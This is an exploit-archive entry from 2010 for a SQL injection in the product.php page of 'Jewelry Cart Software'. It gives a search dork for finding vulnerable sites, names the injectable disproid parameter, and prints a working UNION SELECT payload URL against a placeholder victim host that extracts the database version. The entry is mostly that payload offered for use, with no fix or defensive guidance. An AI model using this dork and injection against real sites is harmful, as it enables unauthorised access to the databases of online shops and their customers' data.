Jewelry Cart Software (product.php) SQL Injection Vulnerability

2010-03-21T00:00:00
ID 1337DAY-ID-11387
Type zdt
Reporter Asyraf
Modified 2010-03-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Jewelry Cart Software (product.php) SQL Injection Vulnerability
===============================================================

**************************************************************
 
# Name : Jewelry Cart Software SQL Injection (product.php) ::-
# Author : Asyraf (Mycrypto Security Force) r0x~!!
# Date : 20/3/2010
# Language : PHP
# Script : Jewelry Cart Software
# Shout : hMSecurity,n3wb0rn,TBD Security
 
# Dork : Powered by Jewelry Cart Software
          product.php?disproid=
 
# Vulnerability : product.php?disproid=[ANY VALUE]
 
# Exploited : http://www.victim.com/product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--
 
***************************************************************



#  0day.today [2018-01-03]  #